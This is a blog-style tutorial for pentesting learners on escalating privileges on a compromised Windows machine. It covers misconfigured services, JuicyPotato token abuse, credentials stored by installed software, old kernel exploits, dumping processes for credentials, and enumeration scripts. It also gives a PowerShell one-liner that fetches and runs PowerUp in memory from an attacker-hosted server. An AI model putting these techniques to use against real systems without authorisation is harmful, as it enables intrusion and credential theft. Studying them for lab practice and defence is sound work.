Hi people! Here I am writing a quick guide for windows privilege escalation. If you’re learning pentesting, this can help you. This guide is based on my own experience, feel free to customize it.
We are assuming you have gotten a low shell on a windows box either by client attack or by exploiting a web service or anything else that can lead to a shell into the targeted machine. Next step, you want to escalate your privilege and become Administrator or System. Opposite to Linux where only the root user is the admin, you can completely own a windows machine just by getting Administrator shell or System shell. Both users have high privileges. Below are the different steps you can follow
- Incorrect permissions in services checking
This is usually a great way to escalate privilege. For example, if you’re dealing with a Windows XP machine, the permission for upnphost is not properly managed. Then, you can easily replace the binary path with your own malicious shell. A good tutorial about this is explained here.
If you can run powershell on the box, PowerView can be a good shell to enumerate potential exploitable services with “Get-ServiceUnquoted -Verbose”, “Get-ModifiableServiceFile -Verbose”, or “Get-ModifiableService – Verbose”
With unquoted services path, you can hijack the path and use it to elevate privileges, a good explanation can be also found here.
You can also automate this with powerUp, a nice powershell script helpful not only in vulnerable services.
Keep in mind checking for vulnerable services is a good point to start in privilege escalation. Whenever you’re on windows XP, remember upnphost, it’s usually obvious to exploit.
- User privilege abuse
You can look for elevated privileges like “SeImpersonatePrivilege” by typing “whoami /priv” in cmd. If “SeImpersonatePrivilege” is enabled, you can abuse this privilege with JuicyPotato. IPPSec has explained this concept practically with Bounty box of HackTheBox, you can watch the video. JuicyPotato doesn’t work on windows server 2019, so don’t lose your time to try it if you are dealing with Windows Server 2019 box.
- Software vulnerabilities
A next point in your hunt can be to check what are the different applications installed on the server. Some applications like “mRemoteNG” stored their password in a way they can be retrieved and decrypted easily. Some even stored their password in clear text. An example of exploiting “mRemoteNG” where the password can be retrieved and decrypted is described here.
Checking the folders inside “C:/Programm File”, “C:/ProgramData” can be very helpful. You can filter your command to avoid built-in windows programs to display.
- System vulnerabilities
How many people leave their system without updating ? Fortunately for pentester, this is a very good chance to get Admin privilege. A quick command “systeminfo” run in cmd, gives you a lot of information about the system, its version, patches installed. Usually, when there is no hotfix, you can try MS15-051, MS11-046 exploit for Win 2003/2008/7/XP.
Windows-exploit-suggester.py is a python script that takes in argument a file containing “systeminfo” command output and suggests exploits that can be used to escalate privileges. If you manage to get a meterpreter session on the box, you can also run “post/multi/recon/local_exploit_suggestor” and enter the required arguments. It will list you potential exploits that can be run to be Admin. The funny and interesting thing with meterpreter is the fact that those exploits can also be run in the same session, you just need to tell meterpreter to run this or that exploit inside your current session.
- Process checking
Running processes can also be a gold mine. For example if a browser is running, you can dump the process and check for credentials. I found this interesting trick in Heist video. Heist is a retired Windows box of HTB.
- Auto enumeration
There are a lot of vulnerable points I have not talked in this post, the truth is there are so many things to talk about and many people have explained them already. I will mention them in reference. The purpose of this post is to help you to build your own strategy based on mine.
As I was saying there are a lot of vulnerabilities or bad config that can leads to Elevation of Privilege (EoP), like auto login where you can read the password in clear text, processes running as admin, where you can use Runas feature to execute your malicious shell with Admin privilege. So many scripts can help you to automate this process of enumeration.
- My favorite on is PowerUp, a powershell script that can be even run in memory using powershell -C IEX (New-Object Net.WebClient).DownloadString(‘http://IP-Of-Your-Hosting-Server/PowerUp.ps1’).
- Another one is JAWS – Just Another Windows (Enum) Script.
- WinPeas is a very powerful enumeration tool available in exe and bat format. This tool even highlights the important stuff in color in order to help you to be focused and not be distracted by the tonne of information revealed.
Summary
As I said, the main purpose of this post is to help to build your own method, or process or strategy for privilege escalation. Here I have suggested one, you are welcome to customize it. So let me summarize what I have been proposing
- Check for incorrect services permissions: upnphost is a nice service leading to EoP in Windows XP.
- User privileges abuse, check for SetImpersonatePrivilege with “whoami /priv”
- Check for softwares installed, some can be vulnerable or store creds in clear text (you can check software exploit in exploit-db).
- Look for systems vulnerabilities by running “system info” and check for suitable exploits based on the output
- Check for running processes, with any chance, you will find credentials or something else useful.
- Run auto enumeration. I have suggested some tools for this purposes
References
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
- https://guif.re/windowseop
- https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
- https://github.com/411Hall/JAWS
- https://github.com/HarmJ0y/PowerUp
- https://github.com/AonCyberLabs/Windows-Exploit-Suggester
- http://ohpe.it/juicy-potato/
- https://blog.rapid7.com/2015/08/11/metasploit-local-exploit-suggester-do-less-get-more/
I hope this post has been helpful for you. Don’t forget to learn some techniques here and to practice a lot. If you liked this post, if you don’t understand something or if you want me to talk about something else, don’t hesitate to comment or to reach me via the contact page. Thanks for reading !!!